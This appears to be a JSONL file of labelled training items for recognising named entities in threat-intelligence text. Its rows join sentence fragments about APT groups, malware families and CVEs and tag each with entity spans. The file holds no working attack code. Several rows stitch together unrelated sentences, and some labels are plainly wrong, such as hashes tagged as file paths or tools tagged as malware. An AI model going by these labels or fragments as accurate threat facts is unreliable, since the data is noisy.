{"text": "Regardless of the parameters , it returns a json containing a link for APK file . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "TOOL: Daserf malware": [[178, 192]], "VULNERABILITY: Flash exploits": [[218, 232]], "MALWARE: Powermud": [[361, 369]], "THREAT_ACTOR: Seedworm group": [[398, 412]], "MALWARE: customized PowerShell": [[419, 440]], "MALWARE: LaZagne": [[443, 450]], "MALWARE: Crackmapexec scripts": [[457, 477]]}, "info": {"id": "cyberner_stix_train_005550", "source": "cyberner_stix_train"}}
{"text": "] 114 [ . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran . RC4 file encryption relies on the Windows 32 CryptoAPI , using the provided value’s MD5 hash as an initial . Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"ORGANIZATION: hosting companies": [[115, 132]], "THREAT_ACTOR: APT33": [[152, 157], [224, 229]], "SYSTEM: Windows": [[287, 294]], "TOOL: CryptoAPI": [[298, 307]], "TOOL: Open Babel": [[362, 372]]}, "info": {"id": "cyberner_stix_train_005552", "source": "cyberner_stix_train"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers .", "spans": {"MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "THREAT_ACTOR: threat groups": [[238, 251]], "VULNERABILITY: exploit": [[264, 271]], "VULNERABILITY: CVE-2018-0798": [[304, 317]]}, "info": {"id": "cyberner_stix_train_005553", "source": "cyberner_stix_train"}}
{"text": "MainService is the central controller of this spyware . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency sevises .", "spans": {"TOOL: DoublePulsar": [[203, 215]], "TOOL: backdoor": [[216, 224]], "TOOL: FuzzBunch": [[231, 240]], "TOOL: framework": [[241, 250]], "TOOL: EternalBlue": [[261, 272]], "TOOL: EternalSynergy": [[275, 289]], "TOOL: EternalRomance": [[296, 310]], "TOOL: exploit": [[311, 318]], "TOOL: tools": [[319, 324]], "THREAT_ACTOR: GCMAN": [[327, 332]]}, "info": {"id": "cyberner_stix_train_005554", "source": "cyberner_stix_train"}}
{"text": "We analyzed the dropper , which is an executable that contains the following three files :", "spans": {"TOOL: dropper": [[16, 23]]}, "info": {"id": "cyberner_stix_train_005555", "source": "cyberner_stix_train"}}
{"text": "Command execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim ’ s device . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers .", "spans": {"VULNERABILITY: exploit": [[209, 216]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[225, 253]], "THREAT_ACTOR: Cobalt": [[299, 305]]}, "info": {"id": "cyberner_stix_train_005556", "source": "cyberner_stix_train"}}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]], "TOOL: Flash": [[262, 267]], "VULNERABILITY: exploits": [[268, 276]], "TOOL: Java": [[346, 350]], "VULNERABILITY: zero-day": [[351, 359]], "ORGANIZATION: Kaspersky Lab": [[419, 432]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[445, 473]]}, "info": {"id": "cyberner_stix_train_005557", "source": "cyberner_stix_train"}}
{"text": "The “ onUserLeaveHint ( ) ” callback method of the Android Activity ( i.e. , the typical GUI screen the user sees ) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice , for example , when the user presses the Home key . Some of the malicious documents were test files without the implant . the original result can be restored by using the following command : There are several methods in which SCIL programs can execute , such as an engineer / operator clicking a button or image within the MicroSCADA system , scheduled or process derived changes , or in this case manual execution .", "spans": {"SYSTEM: Android Activity": [[51, 67]], "TOOL: test files": [[330, 340]], "SYSTEM: MicroSCADA system": [[564, 581]]}, "info": {"id": "cyberner_stix_train_005558", "source": "cyberner_stix_train"}}
{"text": "MD5 43680D1914F28E14C90436E1D42984E2 20D4B9EB9377C499917C4D69BF4CCEBE First widely distributed Android bootkit Malware infects more than 350,000 Devices January 29 , 2014 In the last quarter of 2013 , sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China ’s cyber threat actors . It also sends collected browser data to another script by sending a POST request to “ hxxp://[c2_hostname]/groups / count / write.php ” .", "spans": {"SYSTEM: Android": [[95, 102]], "SYSTEM: ANDROID": [[227, 234]], "SYSTEM: DROID": [[303, 308]], "ORGANIZATION: intelligence services": [[383, 404]], "ORGANIZATION: military": [[407, 415]], "ORGANIZATION: utility providers": [[418, 435]], "ORGANIZATION: telecommunications": [[438, 456]], "ORGANIZATION: power": [[461, 466]], "ORGANIZATION: embassies": [[471, 480]], "ORGANIZATION: government institutions": [[487, 510]], "THREAT_ACTOR: APT1": [[554, 558]]}, "info": {"id": "cyberner_stix_train_005559", "source": "cyberner_stix_train"}}
{"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": {"TOOL: Bisonal": [[45, 52]], "THREAT_ACTOR: crime gang": [[120, 130]], "MALWARE: Carbanak": [[142, 150]], "ORGANIZATION: financial institutions": [[199, 221]]}, "info": {"id": "cyberner_stix_train_005560", "source": "cyberner_stix_train"}}
{"text": "rootdaemon will first attempt to jailbreak the device using a modified version of the DirtyCow exploit . According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry . JhoneRAT : b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 . Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he ’d turned his considerable harassment skills squarely against the company .", "spans": {"VULNERABILITY: DirtyCow exploit": [[86, 102]], "ORGANIZATION: Symantec": [[118, 126]], "ORGANIZATION: healthcare industry": [[224, 243]], "MALWARE: JhoneRAT": [[246, 254]], "FILEPATH: b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366": [[257, 321]], "THREAT_ACTOR: Will Harrison": [[324, 337]], "ORGANIZATION: Ashley Madison": [[359, 373]]}, "info": {"id": "cyberner_stix_train_005561", "source": "cyberner_stix_train"}}
{"text": "But , as we have already mentioned , the criminals could easily turn their attention to users in other countries . Venomous Bear has deployed malware to targets using several novel methods . In addition , the researchers used their analysis to provide detection coverage for Snort , Fireamp , and ClamAV . In July 2023 , Mandiant Consulting responded to a supply chain compromise affecting a US - based software solutions entity .", "spans": {"THREAT_ACTOR: Venomous Bear": [[115, 128]], "TOOL: Snort": [[275, 280]], "TOOL: Fireamp": [[283, 290]], "TOOL: ClamAV": [[297, 303]], "ORGANIZATION: Mandiant Consulting": [[321, 340]], "THREAT_ACTOR: supply chain compromise": [[356, 379]], "ORGANIZATION: a US - based software solutions entity": [[390, 428]]}, "info": {"id": "cyberner_stix_train_005562", "source": "cyberner_stix_train"}}
{"text": "However , this particular email downloads an Android Package Kit ( APK ) , which is the common format used by Android to distribute and install applications . All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing . We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {"SYSTEM: Android Package Kit": [[45, 64]], "SYSTEM: Android": [[110, 117]]}, "info": {"id": "cyberner_stix_train_005563", "source": "cyberner_stix_train"}}
{"text": "PLATINUM uses custom-developed malicious tools and has the resources to update these applications often to avoid being detected . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "TOOL: custom-developed malicious tools": [[14, 46]], "MALWARE: NetTraveler": [[154, 165]], "VULNERABILITY: exploit": [[179, 186]], "VULNERABILITY: CVE-2012-0158": [[187, 200]], "MALWARE: NetTraveler Trojan": [[212, 230]]}, "info": {"id": "cyberner_stix_train_005564", "source": "cyberner_stix_train"}}
{"text": "The macro obtains the payload saved to the system from within the document stored as UserForm1.Label2.Caption and will write it to : %APPDATA%\\MSDN\\~msdn.exe .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: UserForm1.Label2.Caption": [[85, 109]], "FILEPATH: %APPDATA%\\MSDN\\~msdn.exe": [[133, 157]]}, "info": {"id": "cyberner_stix_train_005565", "source": "cyberner_stix_train"}}
{"text": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store .", "spans": {"THREAT_ACTOR: MuddyWater": [[36, 46]], "ORGANIZATION: social engineering": [[55, 73]], "MALWARE: SDK": [[115, 118]], "FILEPATH: SWAnalytics": [[127, 138]], "SYSTEM: Android": [[177, 184]], "ORGANIZATION: Tencent MyApp": [[254, 267]], "ORGANIZATION: Wandoujia": [[270, 279]], "ORGANIZATION: Huawei App Store": [[282, 298]], "ORGANIZATION: Xiaomi App Store": [[305, 321]]}, "info": {"id": "cyberner_stix_train_005566", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: Microsoft Office exploits": [[37, 62]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[110, 137]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[140, 167]], "VULNERABILITY: CVE-2010-3962": [[184, 197]], "VULNERABILITY: CVE-2014-1776": [[240, 253]], "THREAT_ACTOR: Shadow Brokers": [[318, 332]], "THREAT_ACTOR: Equation": [[394, 402]]}, "info": {"id": "cyberner_stix_train_005567", "source": "cyberner_stix_train"}}
{"text": "This disallows apps to be installed on your device from unknown sources . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . Ke3chang has targeted several industries , including oil , government , military , and more .", "spans": {"MALWARE: malware": [[104, 111]], "MALWARE: BS2005 backdoors": [[155, 171]], "MALWARE: TidePool malware": [[215, 231]], "ORGANIZATION: Palo Alto": [[253, 262]], "THREAT_ACTOR: Ke3chang": [[330, 338]]}, "info": {"id": "cyberner_stix_train_005568", "source": "cyberner_stix_train"}}
{"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . Earlier this month , Securelist 's technology caught another zero-day exploits deployed in targeted attacks .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "MALWARE: Microsoft Excel files": [[57, 78]], "ORGANIZATION: Securelist": [[136, 146]], "VULNERABILITY: zero-day": [[176, 184]]}, "info": {"id": "cyberner_stix_train_005569", "source": "cyberner_stix_train"}}
{"text": "This example shows one possible implementation of this technique . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks . The second December spear phishing attack targeted Taiwan based news media organizations . Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. ’s critical infrastructure security ( and more ) .", "spans": {"ORGANIZATION: Group-IB": [[77, 85]], "ORGANIZATION: banks": [[147, 152], [255, 260]], "ORGANIZATION: service provider": [[182, 198]], "ORGANIZATION: bank": [[215, 219]], "ORGANIZATION: Biden administration": [[370, 390]]}, "info": {"id": "cyberner_stix_train_005570", "source": "cyberner_stix_train"}}
{"text": "Also , it appears that the actors used ActionScript from an open source video player called “ f4player ” , which is freely available on GitHub .", "spans": {"TOOL: ActionScript": [[39, 51]], "TOOL: f4player": [[94, 102]], "TOOL: GitHub": [[136, 142]]}, "info": {"id": "cyberner_stix_train_005571", "source": "cyberner_stix_train"}}
{"text": "This was no longer detectable with static signatures by our product .", "spans": {}, "info": {"id": "cyberner_stix_train_005572", "source": "cyberner_stix_train"}}
{"text": "It is generally considered a descendant of the Dyreza banking Trojan and features mutliple modules .", "spans": {"MALWARE: Dyreza": [[47, 53]], "MALWARE: Trojan": [[62, 68]]}, "info": {"id": "cyberner_stix_train_005573", "source": "cyberner_stix_train"}}
{"text": "While Vcrodat is delivered via the malicious dropper , we have yet to discover how Nibatad is delivered to the infected computer . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 .", "spans": {"TOOL: Vcrodat": [[6, 13]], "TOOL: dropper": [[45, 52]], "TOOL: Nibatad": [[83, 90]], "THREAT_ACTOR: actors": [[146, 152]], "VULNERABILITY: CVE-2017-0144": [[240, 253]], "VULNERABILITY: EternalBlue": [[256, 267]], "FILEPATH: MS17-010": [[295, 303]]}, "info": {"id": "cyberner_stix_train_005574", "source": "cyberner_stix_train"}}
{"text": "TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators .", "spans": {"MALWARE: TRITON": [[0, 6]]}, "info": {"id": "cyberner_stix_train_005575", "source": "cyberner_stix_train"}}
{"text": "It 's one of the strings - \" How you 'll sign in '' - that it looks for during the account creation process . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu . Though the security community has not yet broadly discussed this technique , FireEye has observed other threat groups adopting these measures and expect this trend to continue on other community sites . For the CrySyS Lab analysis , please read [ here ] .", "spans": {"TOOL: PDF": [[142, 145]], "TOOL: DOC files": [[150, 159]], "TOOL: Backdoor.Sogu": [[201, 214]], "ORGANIZATION: FireEye": [[294, 301]], "ORGANIZATION: CrySyS Lab": [[428, 438]]}, "info": {"id": "cyberner_stix_train_005576", "source": "cyberner_stix_train"}}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"MALWARE: them": [[22, 26]], "MALWARE: Corkow": [[189, 195]], "ORGANIZATION: users": [[214, 219]]}, "info": {"id": "cyberner_stix_train_005577", "source": "cyberner_stix_train"}}
{"text": "Attributes of one of the artifacts and intelligence gathered on the infrastructure operated by the attackers suggest that the attack was perpetrated by a state-sponsored group known as Sofacy ( or APT28 ) .", "spans": {"THREAT_ACTOR: Sofacy": [[185, 191]], "THREAT_ACTOR: APT28": [[197, 202]]}, "info": {"id": "cyberner_stix_train_005578", "source": "cyberner_stix_train"}}
{"text": "QiAnXin confirmed that this is a DarkHydrus Group’s new attack targeting Middle East region . However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team .", "spans": {"ORGANIZATION: QiAnXin": [[0, 7]], "THREAT_ACTOR: DarkHydrus": [[33, 43]], "FILEPATH: BlackEnergy 3": [[133, 146]], "THREAT_ACTOR: Sandworm Team": [[211, 224]]}, "info": {"id": "cyberner_stix_train_005579", "source": "cyberner_stix_train"}}
{"text": "A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" .", "spans": {"THREAT_ACTOR: group": [[30, 35]], "THREAT_ACTOR: hackers": [[54, 61]], "VULNERABILITY: zero-day exploit": [[105, 121]], "THREAT_ACTOR: Gamma Group": [[247, 258]], "ORGANIZATION: Kaspersky Lab": [[287, 300]], "MALWARE: Epic Turla": [[379, 389]]}, "info": {"id": "cyberner_stix_train_005580", "source": "cyberner_stix_train"}}
{"text": "Given the nature of connected devices in smart homes , it ’ s highly likely many of these devices , and indeed the controller app itself , communicate with one another sending status notifications , alerts and so on . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"TOOL: TeamViewer": [[287, 297]], "THREAT_ACTOR: APT41": [[317, 322]], "THREAT_ACTOR: Sofacy group": [[412, 424]], "TOOL: Flash": [[468, 473]], "VULNERABILITY: exploits": [[474, 482]], "MALWARE: Carberp": [[500, 507]], "MALWARE: JHUHUGIT downloaders": [[514, 534]]}, "info": {"id": "cyberner_stix_train_005581", "source": "cyberner_stix_train"}}
{"text": "It is installed as an ISAPI filter .", "spans": {"TOOL: ISAPI filter": [[22, 34]]}, "info": {"id": "cyberner_stix_train_005582", "source": "cyberner_stix_train"}}
{"text": "Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and exists mostly in the device ’ s RAM , which makes it extremely hard to detect . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia .", "spans": {"MALWARE: Triada": [[0, 6]], "ORGANIZATION: Securelist": [[201, 211]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[241, 276]], "ORGANIZATION: Unit 42": [[322, 329]], "ORGANIZATION: financial organizations": [[457, 480]]}, "info": {"id": "cyberner_stix_train_005583", "source": "cyberner_stix_train"}}
{"text": "The phishing site uses the gathered information as its GET parameter , allowing the attacker to access the stolen information . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . The malware sends another TXT query with the receiver structure, as depicted . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": {"THREAT_ACTOR: APT16": [[175, 180]], "ORGANIZATION: government agency": [[221, 238]], "TOOL: ELMER backdoor": [[321, 335]], "THREAT_ACTOR: Attackers": [[417, 426]]}, "info": {"id": "cyberner_stix_train_005584", "source": "cyberner_stix_train"}}
{"text": "Extracting the payload is straight forward – we simply dump the resource and decompress it .", "spans": {}, "info": {"id": "cyberner_stix_train_005585", "source": "cyberner_stix_train"}}
{"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device .", "spans": {"MALWARE: RIPPER": [[58, 64]], "MALWARE: Win32/Barlaiy": [[137, 150]], "MALWARE: Win32/PlugX.L": [[153, 166]], "THREAT_ACTOR: Barium": [[211, 217]]}, "info": {"id": "cyberner_stix_train_005586", "source": "cyberner_stix_train"}}
{"text": "The commands supported by the analyzed version of the Cerberus bot are listed below . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" .", "spans": {"MALWARE: Cerberus": [[54, 62]], "THREAT_ACTOR: SectorJ04": [[93, 102]], "THREAT_ACTOR: BlackOasis": [[240, 250]]}, "info": {"id": "cyberner_stix_train_005587", "source": "cyberner_stix_train"}}
{"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"THREAT_ACTOR: Cleaver": [[38, 45]], "THREAT_ACTOR: Cyber Army": [[99, 109]], "THREAT_ACTOR: Ashiyane": [[124, 132]], "ORGANIZATION: Syrian Electronic Army": [[155, 177]], "ORGANIZATION: citizens": [[316, 324]]}, "info": {"id": "cyberner_stix_train_005588", "source": "cyberner_stix_train"}}
{"text": "This feature is designed to block one application from accessing the data of other applications without rooting the device . If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . The email address is associated with the Lebanese domain of a major global financial institution .", "spans": {"THREAT_ACTOR: attackers": [[132, 141]], "TOOL: email": [[318, 323]], "ORGANIZATION: financial institution": [[389, 410]]}, "info": {"id": "cyberner_stix_train_005589", "source": "cyberner_stix_train"}}
{"text": "We observed the string “ 1FABFBFF0000065132F71D94 ” in memory during debugging of the native variant .", "spans": {"FILEPATH: 1FABFBFF0000065132F71D94": [[25, 49]]}, "info": {"id": "cyberner_stix_train_005590", "source": "cyberner_stix_train"}}
{"text": "This was an original spyware program , designed to exfiltrate almost all accessible information . Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information . In order to deploy an implant for the final payload , ScarCruft uses a multi-stage binary infection scheme . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"THREAT_ACTOR: Fxmsp": [[98, 103]], "THREAT_ACTOR: ScarCruft": [[272, 281]], "MALWARE: SocGholish": [[342, 352]], "MALWARE: Domen toolkit": [[359, 372]], "MALWARE: sczriptzzbn": [[455, 466]], "MALWARE: SolarMarker": [[475, 486]], "MALWARE: NetSupport RAT": [[502, 516]]}, "info": {"id": "cyberner_stix_train_005591", "source": "cyberner_stix_train"}}
{"text": "INTRODUCTION For the past few weeks , the Cybereason Nocturnus team has been investigating a new type of Android malware dubbed EventBot , which was first identified in March 2020 . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 . iDefense analysts have identified a campaign likely to be targeting members of— or those with affiliation or interest in—the ASEAN Defence Ministers ' Meeting ( ADMM ) .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[42, 62]], "SYSTEM: Android": [[105, 112]], "MALWARE: EventBot": [[128, 136]], "MALWARE: THAM luan - GD -": [[233, 249]], "MALWARE: NCKH2.doc": [[250, 259]], "TOOL: MS12-060": [[344, 352]], "ORGANIZATION: iDefense": [[355, 363]], "ORGANIZATION: Defence Ministers ' Meeting": [[486, 513]], "ORGANIZATION: ADMM": [[516, 520]]}, "info": {"id": "cyberner_stix_train_005592", "source": "cyberner_stix_train"}}
{"text": "After a series of technical analysis ( which is covered in detail below ) and heuristic threat hunting , we discovered that a complete “ Agent Smith ” infection has three main phases : A dropper app lures victim to install itself voluntarily . We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan . Insights from one year of tracking a polymorphic threat . Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": {"MALWARE: Agent Smith": [[137, 148]], "TOOL: date code": [[287, 296]]}, "info": {"id": "cyberner_stix_train_005593", "source": "cyberner_stix_train"}}
{"text": "We sourced the over 561MB of exfiltrated data from this domain alone , all of which we found to be 7z compressed and password protected . \" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said . The technology-themed zones reference well-known technology companies ( AOL , Apple , Google , Microsoft ) , antivirus vendors ( McAfee , Symantec ) , and products ( Blackberry , Bluecoat ) . Looking at the top 3 M domains , only 210 K use CSP .", "spans": {"ORGANIZATION: government agencies": [[170, 189]], "ORGANIZATION: oil": [[192, 195]], "ORGANIZATION: gas companies": [[200, 213]], "ORGANIZATION: technology companies": [[218, 238]], "ORGANIZATION: Citrix Systems Inc": [[251, 269]], "ORGANIZATION: AOL": [[358, 361]], "ORGANIZATION: Apple": [[364, 369]], "ORGANIZATION: Google": [[372, 378]], "ORGANIZATION: Microsoft": [[381, 390]], "ORGANIZATION: McAfee": [[415, 421]], "ORGANIZATION: Symantec": [[424, 432]], "ORGANIZATION: Blackberry": [[452, 462]], "ORGANIZATION: Bluecoat": [[465, 473]], "SYSTEM: CSP": [[526, 529]]}, "info": {"id": "cyberner_stix_train_005594", "source": "cyberner_stix_train"}}
{"text": "The samples we identified leverage the same user agent string “ OPAERA ”", "spans": {}, "info": {"id": "cyberner_stix_train_005595", "source": "cyberner_stix_train"}}
{"text": "We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor . Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver .", "spans": {"SYSTEM: Android": [[109, 116]], "THREAT_ACTOR: MuddyWater’s": [[216, 228]], "TOOL: POWERSTATS backdoor": [[235, 254]], "THREAT_ACTOR: Cleaver": [[257, 264]]}, "info": {"id": "cyberner_stix_train_005596", "source": "cyberner_stix_train"}}
{"text": "As you can see in the following screenshot , simply attempting to highlight the lines in which the DDE instructions reside does not display them .", "spans": {}, "info": {"id": "cyberner_stix_train_005597", "source": "cyberner_stix_train"}}
{"text": "This mobile malware masquerades as legitimate , trusted postal service applications so that it can gain the users trust . The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 .", "spans": {"THREAT_ACTOR: attacker": [[126, 134]], "TOOL: delivered payloads": [[256, 274]], "THREAT_ACTOR: APT15": [[329, 334]], "ORGANIZATION: NCC Group": [[381, 390]]}, "info": {"id": "cyberner_stix_train_005598", "source": "cyberner_stix_train"}}
{"text": "The command uses the echo command to write a large chunk of base64 encoded data to a text file named cmd.txt .", "spans": {"FILEPATH: cmd.txt": [[101, 108]]}, "info": {"id": "cyberner_stix_train_005599", "source": "cyberner_stix_train"}}
{"text": "Symantec Security Response has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India .", "spans": {"ORGANIZATION: Symantec Security Response": [[0, 26]], "THREAT_ACTOR: Patchwork": [[56, 65]], "THREAT_ACTOR: Dropping Elephant": [[82, 99]], "ORGANIZATION: Rapid7": [[202, 208]], "MALWARE: KeyBoy": [[250, 256]], "ORGANIZATION: Microsoft": [[304, 313]], "MALWARE: MS12-060": [[344, 352]]}, "info": {"id": "cyberner_stix_train_005600", "source": "cyberner_stix_train"}}
{"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . While Operation Emmental was able to bypass two-way authentication by tricking its victims into installing a fake app , we have not observed OSX_DOK.C doing this .", "spans": {"THREAT_ACTOR: Spring Dragon group": [[14, 33]], "VULNERABILITY: spearphish exploits": [[60, 79]], "TOOL: fake app": [[247, 255]], "MALWARE: OSX_DOK.C": [[279, 288]]}, "info": {"id": "cyberner_stix_train_005601", "source": "cyberner_stix_train"}}
{"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . Starting in December 2014 , the criminal group began running keyloggers in the infected system .", "spans": {"MALWARE: GRIFFON": [[8, 15]], "MALWARE: keyloggers": [[186, 196]]}, "info": {"id": "cyberner_stix_train_005602", "source": "cyberner_stix_train"}}
{"text": "Malwr.com observed this site in association with another sample that called out to mailsinfo.net – a host identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"DOMAIN: Malwr.com": [[0, 9]], "DOMAIN: mailsinfo.net": [[83, 96]], "MALWARE: KASPERAGENT": [[166, 177]], "MALWARE: MICROPSIA": [[182, 191]]}, "info": {"id": "cyberner_stix_train_005603", "source": "cyberner_stix_train"}}
